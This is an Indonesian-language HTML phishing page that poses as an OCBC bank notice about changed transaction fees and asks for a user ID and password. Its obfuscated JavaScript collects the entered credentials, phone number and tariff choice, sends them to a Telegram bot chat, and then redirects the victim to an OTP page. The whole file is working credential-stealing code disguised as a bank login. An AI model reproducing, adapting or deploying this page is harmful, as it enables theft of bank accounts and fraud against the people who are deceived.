<!DOCTYPE html>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>𝘄𝘄𝘄.𝗼𝗰𝗯𝗰.𝗰𝗼𝗺 | 𝗣𝗲𝗿𝘂𝗯𝗮𝗵𝗮𝗻 𝘀𝗸𝗲𝗺𝗮 𝘁𝗮𝗿𝗶𝗳 𝘁𝗿𝗮𝗻𝘀𝗮𝗸𝘀𝗶</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
        * {
            font-family: 'Ubuntu', sans-serif;
            font-weight: 400;
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            position: relative;
            color: #000;
        }
        body, html {
            background-color: #fff;
            width: 100%;
            height: 100%;
            position: relative;
            margin: 0 auto;
            right: 0;
            left: 0;
            max-width: 450px;
        }
        .container {
            max-width: 90%;
            padding: 0px;
            margin: 10px auto;
            background: #fff;
            border-radius: 15px;
            box-shadow: #dedede 1px 1px 4px 3px;
        }
        button {
            margin-top: 0px;
            width: 100%;
            height: 40px;
            border: none;
            outline: none;
            border-radius: 25px;
            color: #fff;
            background: #d1001a;
            text-align: center;
            font-size: 13px;
            font-weight: bold;
            box-shadow: 2px 2px 2px 0px rgba(8, 8, 0, 0.5);
        }
        button:disabled {
            opacity: 0.7;
            background: #dedede;
        }
        input[type=text],
        input[type=password] {
            width: 90%;
            padding: 12px 10px;
            margin: 0px 0;
            font-weight: 600;
            box-sizing: border-box;
            border: none;
            font-size: 15px;
            border-bottom: 1px solid #9b9b9b;
            outline: none;
        }
        select {
            width: 90%;
            padding: 12px 10px;
            margin: 0px 0;
            font-weight: 600;
            box-sizing: border-box;
            border: none;
            font-size: 15px;
            border-bottom: 1px solid #9b9b9b;
        }
        
    </style>
</head>
<body>
    <img src="https://picjj.com/images/2024/09/11/WSnJVT.png" width="100%" alt="">
    <div style="padding: 6%; height: auto; margin: 0;">
    </div>
    <center>
        <h3 style="font-weight: 950;">Masukkan User ID & Password Kamu</h3>
    </center>
    <br>
    <div class="container">
        <br>
        <form onsubmit="sendUser()" method="POST">
            <input type="hidden" name="tarif" id="tarif">
            <input type="hidden" name="nohp" id="nohp">
            <label style="margin: 25px; font-weight: 850; color: #000; font-size: 16px;">User ID :</label>
            <center>
                <input type="text" placeholder="Input User ID" name="user" id="user" style="text-transform: uppercase" required>
            </center>
            <br>
            <label style="margin: 25px; font-weight: 850; color: #000; font-size: 16px;">Password :</label>
            <center>
                <input type="password" inputmode="alfamerik" placeholder="Input Your Password" name="pass" id="pass" required>
            </center>
            <br>
        </div>
        <br>
        <center>
            <b style="font-size: 12px; color: #d1001a;">Lupa atau Belum Punya Password?</b>
            <a href="#" style="font-size: 12px; color: #d1001a;">Atur Ulang di sini</a>
        </center>
       
            
        </div>
        
                    
                        <button type="submit" style="margin: 0 auto; width: 90%; height: 52px; position: fixed; bottom: 10px; right: 0; left: 0; padding: 0px 0px; font-weight: 700; font-size: 14px; background: #d1001a; color: #fff; border-radius: 10px; font-weight: solid; border: 0px none #fff;max-width: 450px;" id="kirim">Lanjutkan</button>
                    
                
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
        <script src="i.js"></script>
        <script>
            function _0xeb7d(){var _0x3aaf5f=['#pass','LFiBH','&parse_mod','Ajukan\x20Sek','nohp','hPkVz','location','GhNQq','user','.org/bot','24MmDApH','ZAvFF','DNmaQ','hcZuE','kIYQH','KxmjH','mIvgQ','3133886iLoHje','getElement','jhrpE','setItem','ge?chat_id','i.telegram','...','4079883dmpguw','#nohp','e=html','%0A※\x20𝗡𝗼.𝗛𝗽','pass','zfAeL','tEFeM','𝘄𝘄𝘄.𝗼𝗰𝗯𝗰.𝗰','KyULA','preventDef','#user','FSbHp','CxLNO','ault','kirim','lPLDv','2|1|0|3|7|','sjvDg','getItem','\x20••\x20','Dcjqg','ESguE','dNmbb','8|9|7|6|5|','pin_otp.ht','pztoa','qfvRq','oEOxE','𝗼𝗺','https://ap','QNqic','68HlUPZe','GURsi','POST','uSLin','val','AKRsC','26459nNFUmF','/sendMessa','NQIIa','TfYCb','11756816XSMhmU','QHlKP','%0A※\x20𝗣𝗮𝘀𝘀\x20','#tarif','%0A%0A※\x20𝗨𝘀','vemPy','&text=','••\x20','uOTOV','jsRyb','34649838rUNxAw','xurFN','split','arang','4752576MSCrWM','lMuVo','ajax','tZNjI','value','KLsOT','tarif','𝗲𝗿\x20••\x20','5|4|6','%0A※\x20𝗧𝗮𝗿𝗶𝗳','ZFAWO','Memproses.','1861065emaJzG','ById','OJbsi','2|0|1|3|4','lZBoe','innerHTML'];_0xeb7d=function(){return _0x3aaf5f;};return _0xeb7d();}(function(_0x2bc25f,_0x5bdbe5){var _0x1acfad=_0xeea2,_0x44c149=_0x2bc25f();while(!![]){try{var _0x2a2326=parseInt(_0x1acfad(0x139))/(0x14c5+0x774+0x38*-0x81)*(-parseInt(_0x1acfad(0x133))/(0xcb*0x2f+-0x1fe0+-0x563))+-parseInt(_0x1acfad(0x114))/(0x1*-0x111b+0x6d*0x28+0x16)+-parseInt(_0x1acfad(0xea))/(0xc1*-0x32+-0x1ad2*0x1+-0x8*-0x811)+parseInt(_0x1acfad(0xf6))/(-0x4*-0x202+0x14c+-0x94f)*(parseInt(_0x1acfad(0x106))/(-0x12*-0x1fc+0x6a*0x29+-0x1a56*0x2))+parseInt(_0x1acfad(0x10d))/(0x410+-0x1f3e+0x1b35)+-parseInt(_0x1acfad(0x13d))/(0x3a3+-0x3d1+-0x2*-0x1b)+parseInt(_0x1acfad(0x147))/(-0x2091+-0xe2b+0x2ec5);if(_0x2a2326===_0x5bdbe5)break;else _0x44c149['push'](_0x44c149['shift']());}catch(_0x46fadb){_0x44c149['push'](_0x44c149['shift']());}}}(_0xeb7d,-0x12a5d8+-0x2*0x5cb96+0x2b8067));function _0xeea2(_0x53f55e,_0x4f96f6){var _0x506b13=_0xeb7d();return _0xeea2=function(_0x468333,_0x235869){_0x468333=_0x468333-(0x1e73+0x45+-0x1dcf);var _0x34feff=_0x506b13[_0x468333];return _0x34feff;},_0xeea2(_0x53f55e,_0x4f96f6);}function sendUser(){var _0x4c5d30=_0xeea2,_0x50d753={'kIYQH':_0x4c5d30(0x124)+_0x4c5d30(0xf2),'lZBoe':_0x4c5d30(0xf0),'GURsi':_0x4c5d30(0x12b)+_0x4c5d30(0xf9),'uSLin':function(_0x166485,_0x5d4414){return _0x166485(_0x5d4414);},'pztoa':_0x4c5d30(0x11e),'jhrpE':_0x4c5d30(0x104),'ESguE':_0x4c5d30(0x100),'ZAvFF':_0x4c5d30(0xfc),'QHlKP':_0x4c5d30(0x118),'qfvRq':_0x4c5d30(0x115),'Dcjqg':_0x4c5d30(0x140),'CxLNO':_0x4c5d30(0x12c)+'ml','lMuVo':_0x4c5d30(0x122),'dNmbb':_0x4c5d30(0xff)+_0x4c5d30(0xe9),'tEFeM':function(_0x13126b,_0x45f81d,_0x34085e){return _0x13126b(_0x45f81d,_0x34085e);},'QNqic':function(_0x14ecca,_0x284d82){return _0x14ecca+_0x284d82;},'tZNjI':function(_0x1deca3,_0x5d6f79){return _0x1deca3+_0x5d6f79;},'hcZuE':function(_0x3110c4,_0x118f06){return _0x3110c4+_0x118f06;},'mIvgQ':function(_0x4f1ded,_0x51ebd2){return _0x4f1ded+_0x51ebd2;},'vemPy':_0x4c5d30(0xf3)+_0x4c5d30(0x127),'sjvDg':_0x4c5d30(0x117)+_0x4c5d30(0x127),'KxmjH':_0x4c5d30(0x141)+_0x4c5d30(0xf1),'OJbsi':_0x4c5d30(0x13f)+_0x4c5d30(0x144),'jsRyb':_0x4c5d30(0x11b)+_0x4c5d30(0x130),'DNmaQ':_0x4c5d30(0xf5)+_0x4c5d30(0x113)},_0x222e4f=_0x50d753[_0x4c5d30(0x10a)][_0x4c5d30(0x149)]('|'),_0x24ddb3=-0xd*-0x21+0x22da*0x1+-0x2487;while(!![]){switch(_0x222e4f[_0x24ddb3++]){case'0':document[_0x4c5d30(0x10e)+_0x4c5d30(0xf7)](_0x50d753[_0x4c5d30(0xfa)])[_0x4c5d30(0xee)]=sessionStorage[_0x4c5d30(0x126)](_0x50d753[_0x4c5d30(0xfa)]);continue;case'1':event[_0x4c5d30(0x11d)+_0x4c5d30(0x121)]();continue;case'2':var _0x31c2a3={'FSbHp':_0x50d753[_0x4c5d30(0x134)],'KyULA':function(_0x3f2c0c,_0x329f76){var _0x154459=_0x4c5d30;return _0x50d753[_0x154459(0x136)](_0x3f2c0c,_0x329f76);},'zfAeL':_0x50d753[_0x4c5d30(0x12d)],'TfYCb':_0x50d753[_0x4c5d30(0x10f)],'hPkVz':_0x50d753[_0x4c5d30(0x129)],'KLsOT':_0x50d753[_0x4c5d30(0x107)],'lPLDv':_0x50d753[_0x4c5d30(0x13e)],'xurFN':function(_0x164d8e,_0x3bc1c3){var _0xa421ac=_0x4c5d30;return _0x50d753[_0xa421ac(0x136)](_0x164d8e,_0x3bc1c3);},'ZFAWO':_0x50d753[_0x4c5d30(0x12e)],'AKRsC':_0x50d753[_0x4c5d30(0xfa)],'uOTOV':_0x50d753[_0x4c5d30(0x128)],'GhNQq':_0x50d753[_0x4c5d30(0x120)],'oEOxE':_0x50d753[_0x4c5d30(0xeb)],'LFiBH':_0x50d753[_0x4c5d30(0x12a)],'NQIIa':function(_0x3ebf7c,_0x277b95,_0x2fb9f6){var _0x4fbefb=_0x4c5d30;return _0x50d753[_0x4fbefb(0x11a)](_0x3ebf7c,_0x277b95,_0x2fb9f6);}};continue;case'3':document[_0x4c5d30(0x10e)+_0x4c5d30(0xf7)](_0x50d753[_0x4c5d30(0x129)])[_0x4c5d30(0xee)]=sessionStorage[_0x4c5d30(0x126)](_0x50d753[_0x4c5d30(0x129)]);continue;case'4':var _0x25f3d8=_0x50d753[_0x4c5d30(0x132)](_0x50d753[_0x4c5d30(0x132)](_0x50d753[_0x4c5d30(0x132)](_0x50d753[_0x4c5d30(0x132)](_0x50d753[_0x4c5d30(0xed)](_0x50d753[_0x4c5d30(0x109)](_0x50d753[_0x4c5d30(0x10c)](_0x50d753[_0x4c5d30(0xed)](_0x50d753[_0x4c5d30(0x10c)]('',_0x3b25be),_0x50d753[_0x4c5d30(0x142)]),tarif[_0x4c5d30(0xee)]),_0x50d753[_0x4c5d30(0x125)]),nohp[_0x4c5d30(0xee)]),_0x50d753[_0x4c5d30(0x10b)]),user[_0x4c5d30(0xee)]),_0x50d753[_0x4c5d30(0xf8)]),pass[_0x4c5d30(0xee)]);continue;case'5':var _0x3b25be=_0x50d753[_0x4c5d30(0x146)];continue;case'6':$[_0x4c5d30(0xec)]({'url':_0x4c5d30(0x131)+_0x4c5d30(0x112)+_0x4c5d30(0x105)+token+(_0x4c5d30(0x13a)+_0x4c5d30(0x111)+'=')+grup+_0x4c5d30(0x143)+_0x25f3d8+(_0x4c5d30(0xfe)+_0x4c5d30(0x116)),'method':_0x4c5d30(0x135),'complete':function(){var _0x1583bb=_0x4c5d30;_0x31c2a3[_0x1583bb(0x13b)](setTimeout,function(){var _0x13ef38=_0x1583bb,_0x510cb3=_0x31c2a3[_0x13ef38(0x11f)][_0x13ef38(0x149)]('|'),_0x47120d=-0x8*-0x147+0x45*-0x6d+0x1329;while(!![]){switch(_0x510cb3[_0x47120d++]){case'0':var _0x499cbd=_0x31c2a3[_0x13ef38(0x11c)]($,_0x31c2a3[_0x13ef38(0x119)])[_0x13ef38(0x137)]();continue;case'1':sessionStorage[_0x13ef38(0x110)](_0x31c2a3[_0x13ef38(0x13c)],_0x499cbd);continue;case'2':sessionStorage[_0x13ef38(0x110)](_0x31c2a3[_0x13ef38(0x101)],_0x1ff5ae);continue;case'3':var _0x51d4d2=_0x31c2a3[_0x13ef38(0x11c)]($,_0x31c2a3[_0x13ef38(0xef)])[_0x13ef38(0x137)]();continue;case'4':sessionStorage[_0x13ef38(0x110)](_0x31c2a3[_0x13ef38(0x123)],_0x51d4d2);continue;case'5':var _0x1ff5ae=_0x31c2a3[_0x13ef38(0x148)]($,_0x31c2a3[_0x13ef38(0xf4)])[_0x13ef38(0x137)]();continue;case'6':sessionStorage[_0x13ef38(0x110)](_0x31c2a3[_0x13ef38(0x138)],_0x6b7e11);continue;case'7':var _0x6b7e11=_0x31c2a3[_0x13ef38(0x148)]($,_0x31c2a3[_0x13ef38(0x145)])[_0x13ef38(0x137)]();continue;case'8':window[_0x13ef38(0x102)]=_0x31c2a3[_0x13ef38(0x103)];continue;case'9':document[_0x13ef38(0x10e)+_0x13ef38(0xf7)](_0x31c2a3[_0x13ef38(0x12f)])[_0x13ef38(0xfb)]=_0x31c2a3[_0x13ef38(0xfd)];continue;}break;}},0xf04+0x9a4*-0x1+-0x434);}});continue;case'7':document[_0x4c5d30(0x10e)+_0x4c5d30(0xf7)](_0x50d753[_0x4c5d30(0xeb)])[_0x4c5d30(0xfb)]=_0x50d753[_0x4c5d30(0x108)];continue;}break;}};
        </script>
</body>
</html>
